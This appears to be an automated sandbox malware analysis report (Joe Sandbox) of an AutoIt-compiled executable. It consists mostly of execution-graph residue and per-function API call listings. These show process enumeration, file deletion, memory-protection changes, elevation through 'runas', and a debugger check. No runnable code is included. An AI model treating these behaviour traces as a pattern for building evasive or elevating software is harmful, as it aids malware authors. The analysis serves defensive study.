API calls 102614 ae8d4e 102613->102614 102618 b26873 102614->102618 102619 ae8d5c 102614->102619 102615 ae8d3c 
102615->102613 102616 ae8ec0 52 API calls 102621 ae8d27 102616->102621 102617->102644 102625 b268bc 102618->102625 102626 b2687d 102618->102626 102623 b2696e 102619->102623 102624 ae8d71 102619->102624 102627 ae8ec0 52 API calls 102621->102627 102622 ae8e71 102622->102449 102631 ae8470 8 API calls 102623->102631 102629 ae8470 8 API calls 102624->102629 102628 ae8470 8 API calls 102625->102628 102632 ae8470 8 API calls 102626->102632 102627->102615 102633 b268c5 102628->102633 102634 ae8d79 102629->102634 102630 ae893c 8 API calls 102630->102644 102636 b2697b 102631->102636 102637 b26885 102632->102637 102638 ae8a60 8 API calls 102633->102638 102639 aebd57 8 API calls 102634->102639 102635->102615 102635->102616 102663 ae8d91 try_get_first_available_module 102635->102663 102641 ae8a60 8 API calls 102636->102641 102642 ae8ec0 52 API calls 102637->102642 102643 b268e1 102638->102643 102639->102663 102640 ae8a60 8 API calls 102640->102644 102641->102663 102645 b26897 102642->102645 102650 ae8ec0 52 API calls 102643->102650 102644->102622 102644->102630 102644->102640 103189 ae8844 8 API calls __fread_nolock 102644->103189 103190 ae8844 8 API calls __fread_nolock 102645->103190 102648 b268ab 102649 ae893c 8 API calls 102648->102649 102651 b268b9 102649->102651 102653 b268fc 102650->102653 102657 ae8a60 8 API calls 102651->102657 103191 ae8844 8 API calls __fread_nolock 102653->103191 102654 b269f1 102660 ae893c 8 API calls 102654->102660 102655 b269c1 102655->102654 102658 b269e5 102655->102658 102657->102622 103192 aead40 8 API calls __fread_nolock 102658->103192 102664 b269ff 102660->102664 102661 b26910 102665 ae893c 8 API calls 102661->102665 102663->102622 102663->102655 103174 ae8844 8 API calls __fread_nolock 102663->103174 103175 ae893c 102663->103175 103178 ae8a60 102663->103178 102666 ae8a60 8 API calls 102664->102666 102665->102651 102667 b26a12 102666->102667 102668 aebd57 8 API calls 102667->102668 102669 b269ef 102668->102669 102674 b6a5c5 102670->102674 
102671 ae8ec0 52 API calls 102672 b6a632 102671->102672 103195 b518a9 102672->103195 102674->102671 102675 b6a5d4 102674->102675 102675->102449 102677 ae8ec0 52 API calls 102676->102677 102678 b56662 102677->102678 103236 b4dc54 102678->103236 102680 b5666a 102681 b5666e GetLastError 102680->102681 102682 b56683 102680->102682 102681->102682 102682->102449 102685 b6a6c5 102683->102685 102686 b6a705 102683->102686 102684 b6a723 102684->102685 102687 aec98d 39 API calls 102684->102687 102689 b6a780 102684->102689 102685->102449 102686->102684 102688 aec98d 39 API calls 102686->102688 102687->102689 102688->102684 102690 b50372 58 API calls 102689->102690 102690->102685 102692 b689b6 119 API calls 102691->102692 102693 b6a00c 102692->102693 102693->102449 102695 b67b52 102694->102695 102696 b67b38 102694->102696 102697 b660e6 8 API calls 102695->102697 103278 b53fe1 81 API calls __wsopen_s 102696->103278 102700 b67b5d 102697->102700 102699 b67b4a 102699->102411 102701 af0340 206 API calls 102700->102701 102702 b67bc1 102701->102702 102702->102699 102703 b67c5c 102702->102703 102706 b67c03 102702->102706 102704 b67c62 102703->102704 102705 b67cb0 102703->102705 103279 b51ad8 8 API calls 102704->103279 102705->102699 102707 ae8ec0 52 API calls 102705->102707 102712 b5148b 8 API calls 102706->102712 102708 b67cc2 102707->102708 102710 aec2c9 8 API calls 102708->102710 102713 b67ce6 CharUpperBuffW 102710->102713 102711 b67c85 103280 aebd07 8 API calls 102711->103280 102715 b67c3b 102712->102715 102717 b67d00 102713->102717 102716 af2b20 206 API calls 102715->102716 102716->102699 102718 b67d07 102717->102718 102719 b67d53 102717->102719 102723 b5148b 8 API calls 102718->102723 102720 ae8ec0 52 API calls 102719->102720 102721 b67d5b 102720->102721 103281 afaa65 9 API calls 102721->103281 102724 b67d35 102723->102724 102725 af2b20 206 API calls 102724->102725 102725->102699 102726 b67d65 102726->102699 102727 ae8ec0 52 API calls 102726->102727 102728 b67d80 102727->102728 
103282 aebd07 8 API calls 102728->103282 102730->102441 102731->102409 102733 aeb338 _wcslen 102732->102733 102734 b0017b 8 API calls 102733->102734 102735 aeb360 __fread_nolock 102734->102735 102736 b0014b 8 API calls 102735->102736 102737 aeb376 102736->102737 102737->102422 102738->102412 102739->102421 102740->102434 102741->102434 102742->102449 102743->102449 102744->102449 102745->102447 102746->102449 102747->102520 102748->102524 102749->102522 102750->102518 102752 b0017b 8 API calls 102751->102752 102753 afc209 102752->102753 102754 b0014b 8 API calls 102753->102754 102755 afc215 102754->102755 102755->102534 102757 aff9fe 102756->102757 102758 affa35 102756->102758 102759 b0017b 8 API calls 102757->102759 102773 affe8a 8 API calls 102758->102773 102761 affa05 WideCharToMultiByte 102759->102761 102772 affa3e 8 API calls __fread_nolock 102761->102772 102762 affa29 102762->102539 102765 aec99e 102764->102765 102766 aec9a5 102764->102766 102765->102766 102774 b06641 39 API calls _strftime 102765->102774 102766->102532 102768 aec9e8 102768->102532 102770 b0014b 8 API calls 102769->102770 102771 ae424e 102770->102771 102771->102546 102771->102547 102772->102762 102773->102762 102774->102768 102775->102559 102808 b502aa 102776->102808 102779 b503f3 102824 b505e9 56 API calls __fread_nolock 102779->102824 102780 b5040b 102782 b50471 102780->102782 102783 b5041b 102780->102783 102784 b50507 102782->102784 102785 b504a1 102782->102785 102796 b50399 __fread_nolock 102782->102796 102807 b50453 102783->102807 102825 b52855 10 API calls 102783->102825 102786 b505b0 102784->102786 102787 b50510 102784->102787 102788 b504a6 102785->102788 102789 b504d1 102785->102789 102786->102796 102833 aec63f 39 API calls 102786->102833 102790 b50515 102787->102790 102791 b5058d 102787->102791 102788->102796 102828 aeca5b 39 API calls 102788->102828 102789->102796 102829 aeca5b 39 API calls 102789->102829 102793 b50554 102790->102793 102794 b5051b 102790->102794 102791->102796 
102832 aec63f 39 API calls 102791->102832 102793->102796 102831 aec63f 39 API calls 102793->102831 102794->102796 102830 aec63f 39 API calls 102794->102830 102795 b50427 102826 b52855 10 API calls 102795->102826 102796->102567 102805 b5043e __fread_nolock 102827 b52855 10 API calls 102805->102827 102815 b51844 102807->102815 102809 b502f7 102808->102809 102814 b502bb 102808->102814 102810 aec98d 39 API calls 102809->102810 102812 b502f5 102810->102812 102811 ae8ec0 52 API calls 102811->102814 102812->102779 102812->102780 102812->102796 102814->102811 102814->102812 102834 b04d98 102814->102834 102816 b5184f 102815->102816 102817 b0014b 8 API calls 102816->102817 102818 b51856 102817->102818 102819 b51883 102818->102819 102820 b51862 102818->102820 102821 b0017b 8 API calls 102819->102821 102822 b0017b 8 API calls 102820->102822 102823 b5186b ___scrt_fastfail 102821->102823 102822->102823 102823->102796 102824->102796 102825->102795 102826->102805 102827->102807 102828->102796 102829->102796 102830->102796 102831->102796 102832->102796 102833->102796 102835 b04da6 102834->102835 102836 b04e1b 102834->102836 102843 b04dcb 102835->102843 102844 b0f649 20 API calls _free 102835->102844 102846 b04e2d 40 API calls 3 library calls 102836->102846 102839 b04e28 102839->102814 102840 b04db2 102845 b12b5c 26 API calls _strftime 102840->102845 102842 b04dbd 102842->102814 102843->102814 102844->102840 102845->102842 102846->102839 102848 ae8ec0 52 API calls 102847->102848 102849 b689ed 102848->102849 102872 b68a32 messages 102849->102872 102885 b69730 102849->102885 102851 b68cde 102852 b68eac 102851->102852 102857 b68cec 102851->102857 102935 b69941 59 API calls 102852->102935 102855 b68ebb 102856 b68ec7 102855->102856 102855->102857 102856->102872 102898 b688e3 102857->102898 102858 ae8ec0 52 API calls 102876 b68aa6 102858->102876 102863 b68d25 102912 afffe0 102863->102912 102866 b68d45 102919 b53fe1 81 API calls __wsopen_s 102866->102919 102867 b68d5f 102920 ae7e12 
102867->102920 102870 b68d50 GetCurrentProcess TerminateProcess 102870->102867 102872->102570 102876->102851 102876->102858 102876->102872 102917 b44ad3 8 API calls __fread_nolock 102876->102917 102918 b68f7a 41 API calls _strftime 102876->102918 102877 b68f22 102877->102872 102880 b68f36 FreeLibrary 102877->102880 102878 b68d9e 102932 b695d8 74 API calls 102878->102932 102880->102872 102884 b68daf 102884->102877 102933 af1ca0 8 API calls 102884->102933 102934 aeb4c8 8 API calls 102884->102934 102936 b695d8 74 API calls 102884->102936 102937 aec2c9 102885->102937 102887 b6974b CharLowerBuffW 102943 b49805 102887->102943 102894 b6979b 102967 aeadf4 102894->102967 102896 b698bb _wcslen 102896->102876 102897 b697a5 _wcslen 102897->102896 102971 b68f7a 41 API calls _strftime 102897->102971 102899 b688fe 102898->102899 102903 b68949 102898->102903 102900 b0017b 8 API calls 102899->102900 102901 b68920 102900->102901 102902 b0014b 8 API calls 102901->102902 102901->102903 102902->102901 102904 b69af3 102903->102904 102905 b69d08 messages 102904->102905 102910 b69b17 _strcat _wcslen ___std_exception_copy 102904->102910 102905->102863 102906 aec63f 39 API calls 102906->102910 102907 aec98d 39 API calls 102907->102910 102908 aeca5b 39 API calls 102908->102910 102909 ae8ec0 52 API calls 102909->102910 102910->102905 102910->102906 102910->102907 102910->102908 102910->102909 102975 b4f8c5 10 API calls _wcslen 102910->102975 102914 affff5 102912->102914 102913 b0008d NtProtectVirtualMemory 102916 b0005b 102913->102916 102914->102913 102915 b0007b CloseHandle 102914->102915 102914->102916 102915->102916 102916->102866 102916->102867 102917->102876 102918->102876 102919->102870 102921 ae7e1a 102920->102921 102922 b0014b 8 API calls 102921->102922 102923 ae7e28 102922->102923 102976 ae8445 102923->102976 102926 ae8470 102979 aec760 102926->102979 102928 ae8480 102929 b0017b 8 API calls 102928->102929 102930 ae851c 102928->102930 102929->102930 102930->102884 102931 af1ca0 8 API 
calls 102930->102931 102931->102878 102932->102884 102933->102884 102934->102884 102935->102855 102936->102884 102938 aec2dc 102937->102938 102939 aec2d9 __fread_nolock 102937->102939 102940 b0014b 8 API calls 102938->102940 102939->102887 102941 aec2e7 102940->102941 102942 b0017b 8 API calls 102941->102942 102942->102939 102944 b49825 _wcslen 102943->102944 102945 b49914 102944->102945 102947 b49919 102944->102947 102949 b4985a 102944->102949 102945->102897 102950 aebf73 102945->102950 102947->102945 102973 afe36b 41 API calls 102947->102973 102949->102945 102972 afe36b 41 API calls 102949->102972 102951 b0017b 8 API calls 102950->102951 102952 aebf88 102951->102952 102953 b0014b 8 API calls 102952->102953 102954 aebf96 102953->102954 102955 aeacc0 102954->102955 102957 aeace1 102955->102957 102966 aeaccf 102955->102966 102956 aec2c9 8 API calls 102958 b305a3 __fread_nolock 102956->102958 102959 b30557 102957->102959 102960 aead07 102957->102960 102957->102966 102962 b0014b 8 API calls 102959->102962 102974 ae88e8 8 API calls 102960->102974 102964 b30561 102962->102964 102963 aeacda __fread_nolock 102963->102894 102965 b0017b 8 API calls 102964->102965 102965->102966 102966->102956 102966->102963 102968 aeae0b __fread_nolock 102967->102968 102969 aeae02 102967->102969 102968->102897 102968->102968 102969->102968 102970 aec2c9 8 API calls 102969->102970 102970->102968 102971->102896 102972->102949 102973->102947 102974->102963 102975->102910 102977 b0014b 8 API calls 102976->102977 102978 ae7e30 102977->102978 102978->102926 102980 aec76b 102979->102980 102981 b31285 102980->102981 102986 aec773 messages 102980->102986 102982 b0014b 8 API calls 102981->102982 102984 b31291 102982->102984 102983 aec77a 102983->102928 102986->102983 102987 aec7e0 8 API calls messages 102986->102987 102987->102986 102989 ae3996 ___scrt_fastfail 102988->102989 103021 ae5f32 102989->103021 102993 ae3a3a Shell_NotifyIconW 103025 ae61a9 102993->103025 102994 b240cd Shell_NotifyIconW 
102995 ae3a1c 102995->102993 102995->102994 102997 ae3a50 102997->102586 102999 ae3969 102998->102999 103000 ae3919 ___scrt_fastfail 102998->103000 102999->102586 103001 ae3938 Shell_NotifyIconW 103000->103001 103001->102999 103003 b0017b 8 API calls 103002->103003 103004 ae7afa 103003->103004 103005 b0014b 8 API calls 103004->103005 103006 ae7b08 103005->103006 103006->102586 103007->102586 103008->102586 103010 b26610 103009->103010 103011 ae8587 _wcslen 103009->103011 103012 aeadf4 8 API calls 103010->103012 103014 ae859d 103011->103014 103015 ae85c2 103011->103015 103013 b26619 103012->103013 103013->103013 103102 ae88e8 8 API calls 103014->103102 103016 b0014b 8 API calls 103015->103016 103019 ae85ce 103016->103019 103018 ae85a5 __fread_nolock 103018->102586 103020 b0017b 8 API calls 103019->103020 103020->103018 103022 ae39eb 103021->103022 103023 ae5f4e 103021->103023 103022->102995 103055 b4d11f 42 API calls _strftime 103022->103055 103023->103022 103024 b25070 DestroyIcon 103023->103024 103024->103022 103026 ae61c6 103025->103026 103045 ae62a8 103025->103045 103027 ae7ad5 8 API calls 103026->103027 103028 ae61d4 103027->103028 103029 b25278 LoadStringW 103028->103029 103030 ae61e1 103028->103030 103033 b25292 103029->103033 103031 ae8577 8 API calls 103030->103031 103032 ae61f6 103031->103032 103034 ae6203 103032->103034 103042 b252ae 103032->103042 103036 aebed9 8 API calls 103033->103036 103038 ae6229 ___scrt_fastfail 103033->103038 103034->103033 103035 ae620d 103034->103035 103056 ae6b7c 103035->103056 103036->103038 103043 ae628e Shell_NotifyIconW 103038->103043 103041 b252f1 103075 affe6f 51 API calls 103041->103075 103042->103038 103042->103041 103044 aebf73 8 API calls 103042->103044 103043->103045 103046 b252d8 103044->103046 103045->102997 103074 b4a350 9 API calls 103046->103074 103049 b25310 103051 ae6b7c 8 API calls 103049->103051 103050 b252e3 103052 ae7bb5 8 API calls 103050->103052 103053 b25321 103051->103053 103052->103041 103054 ae6b7c 8 
API calls 103053->103054 103054->103038 103055->102995 103057 b257fe 103056->103057 103058 ae6b93 103056->103058 103060 b0014b 8 API calls 103057->103060 103076 ae6ba4 103058->103076 103062 b25808 _wcslen 103060->103062 103061 ae621b 103065 ae7bb5 103061->103065 103063 b0017b 8 API calls 103062->103063 103064 b25841 __fread_nolock 103063->103064 103066 ae7bc7 103065->103066 103067 b2641d 103065->103067 103091 ae7bd8 103066->103091 103101 b413c8 8 API calls __fread_nolock 103067->103101 103070 ae7bd3 103070->103038 103071 b26433 103072 b26427 103072->103071 103073 aebed9 8 API calls 103072->103073 103073->103071 103074->103050 103075->103049 103077 ae6bb4 _wcslen 103076->103077 103078 b25860 103077->103078 103079 ae6bc7 103077->103079 103081 b0014b 8 API calls 103078->103081 103086 ae7d74 103079->103086 103083 b2586a 103081->103083 103082 ae6bd4 __fread_nolock 103082->103061 103084 b0017b 8 API calls 103083->103084 103085 b2589a __fread_nolock 103084->103085 103088 ae7d8a 103086->103088 103090 ae7d85 __fread_nolock 103086->103090 103087 b26528 103088->103087 103089 b0017b 8 API calls 103088->103089 103089->103090 103090->103082 103092 ae7be7 103091->103092 103098 ae7c1b __fread_nolock 103091->103098 103093 b2644e 103092->103093 103094 ae7c0e 103092->103094 103092->103098 103095 b0014b 8 API calls 103093->103095 103096 ae7d74 8 API calls 103094->103096 103097 b2645d 103095->103097 103096->103098 103099 b0017b 8 API calls 103097->103099 103098->103070 103100 b26491 __fread_nolock 103099->103100 103101->103072 103102->103018 103113 b4e80e 103103->103113 103105 b4ddd4 Process32NextW 103106 b4de86 CloseHandle 103105->103106 103111 b4ddcd 103105->103111 103106->102594 103107 aebf73 8 API calls 103107->103111 103108 aeb329 8 API calls 103108->103111 103110 ae7bb5 8 API calls 103110->103111 103111->103105 103111->103106 103111->103107 103111->103108 103111->103110 103119 ae568e 103111->103119 103161 afe36b 41 API calls 103111->103161 103114 b4e819 103113->103114 103115 
Execution Graph

The execution graph from this report survived only as graph residue (basic-block node identifiers and "->" edges from the interactive viewer) and is not reproduced here. The Windows API functions named on the graph nodes, in order of first appearance, are:

GetStringTypeW, CharLowerBuffW, FindFirstFileW, FindNextFileW, FindClose, DeleteFileW, GetFullPathNameW, GetFileAttributesW, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateFileW, GetFileType, GetLastError, CloseHandle, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, PostQuitMessage, DefWindowProcW, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow, Shell_NotifyIconW, SetFocus, DeleteObject, DestroyWindow, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, IsThemeActive, GetModuleHandleW, SystemParametersInfoW, TerminateProcess, RtlAllocateHeap, GetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetOpenFileNameW, CreateWindowExW, ShowWindow, GetModuleFileNameW, GetLongPathNameW, PeekMessageW, GetInputState, TranslateAcceleratorW, timeGetTime, TranslateMessage, DispatchMessageW, Sleep, GetExitCodeProcess, WaitForSingleObject, GetForegroundWindow, QueryPerformanceCounter, QueryPerformanceFrequency, IsDialogMessageW, GetClassLongW.

CRT-internal symbols also labelled on the graph: _strftime, __wsopen_s, __fread_nolock, _free, __onexit, _abort, _wcslen, ___scrt_fastfail, ___DestructExceptionObject, __Init_thread_wait, __Init_thread_footer, pre_c_initialization, try_get_first_available_module.
104525->104507 104526->104504

Control-flow Graph (rendered graph image; node/edge listing omitted)
APIs
• GetVersionExW.KERNEL32(?), ref: 00AE5FF7
  • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
• GetCurrentProcess.KERNEL32(?,00B7DC2C,00000000,?,?), ref: 00AE6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00AE612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AE6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AE6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00AE6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00AE617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00AE61A1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 0f6fcc92ba2a20fabef609d6620fb6cd8a30bc52598ccd8c4b79200eea571f23
• Instruction ID: c521f79a860acdcba9365125f69d10951f9693bcfded6255e30cd1ddb8743c8a
• Opcode Fuzzy Hash: 0f6fcc92ba2a20fabef609d6620fb6cd8a30bc52598ccd8c4b79200eea571f23
• Instruction Fuzzy Hash: 77A1833290A3D4DFC722CB797C451997FE4AB36380B084A99D485A7362CEFD4548CB3A

Control-flow Graph (rendered graph image; not reproduced here)

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00AE3368,?), ref: 00AE33BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00AE3368,?), ref: 00AE33CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00BB2418,00BB2400,?,?,?,?,?,?,00AE3368,?), ref: 00AE343A
  • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
  • Part of subcall function 00AE425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AE3462,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00AE42A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00AE34BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B23CB0
• SetCurrentDirectoryW.KERNEL32(?,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00B23CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BA31F4,00BB2418,?,?,?,?,?,?,?,00AE3368), ref: 00B23D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00B23D81
  • Part of subcall function 00AE34D3: GetSysColorBrush.USER32(0000000F), ref: 00AE34DE
  • Part of subcall function 00AE34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00AE34ED
  • Part of subcall function 00AE34D3: LoadIconW.USER32(00000063), ref: 00AE3503
  • Part of subcall function 00AE34D3: LoadIconW.USER32(000000A4), ref: 00AE3515
  • Part of subcall function 00AE34D3: LoadIconW.USER32(000000A2), ref: 00AE3527
  • Part of subcall function 00AE34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE353F
  • Part of subcall function 00AE34D3: RegisterClassExW.USER32(?), ref: 00AE3590
  • Part of subcall function 00AE35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE35E1
  • Part of subcall function 00AE35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3602
  • Part of subcall function 00AE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE3616
  • Part of subcall function 00AE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE361F
  • Part of subcall function 00AE396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE3A3C
Strings
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B23CAA
• runas, xrefs: 00B23D75
• AutoIt, xrefs: 00B23CA5
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 683915450-2030392706
• Opcode ID: fa8b8e122fc4862d871b53c4fb47eb43224e9a70139268be077a5dbed925d318
• Instruction ID: 5e1658da4263b4fe6962db2b24db3e9f920e8f57fb0f680c846bd99eb67af5c6
• Opcode Fuzzy Hash: fa8b8e122fc4862d871b53c4fb47eb43224e9a70139268be077a5dbed925d318
• Instruction Fuzzy Hash: A951E472108380AFDB05EF619D159BB7BF89F95780F040968F586532A2DFA48A89C722

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4EAB0: GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B4DCCB
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DD1B
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B4DD2C
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4DD43
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4DD4C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                    • Opcode ID: 352073451f256dbe76c94f8974bff7fac95039fa1b6491e23cc15a4d7bc830ba
                                                                                                                                                                                                                                                                                    • Instruction ID: 48a3dbadb40ed695dc3073a67e457f3d903275889cb78589c73930176ff2e7d4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 352073451f256dbe76c94f8974bff7fac95039fa1b6491e23cc15a4d7bc830ba
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6314931418385AFC301EF60DE958AFB7E8AE95304F404E6DF4D583192EF21DA0ADB62
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00B4DDAC
                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00B4DDBA
                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00B4DDDA
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B4DE87
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 88288cef7c0393e2f1d20231e7f4a07899336538d56b857f90a6d736cc4940b9
                                                                                                                                                                                                                                                                                    • Instruction ID: 43e55cfbe8da4a182751b5f6539e5a66fb4459cbbd0923c6677916059d0b9d07
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88288cef7c0393e2f1d20231e7f4a07899336538d56b857f90a6d736cc4940b9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E318D711083419FD701EF64CC85AAFBBF8EF99340F44096DF585871A1EB719A49CBA2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
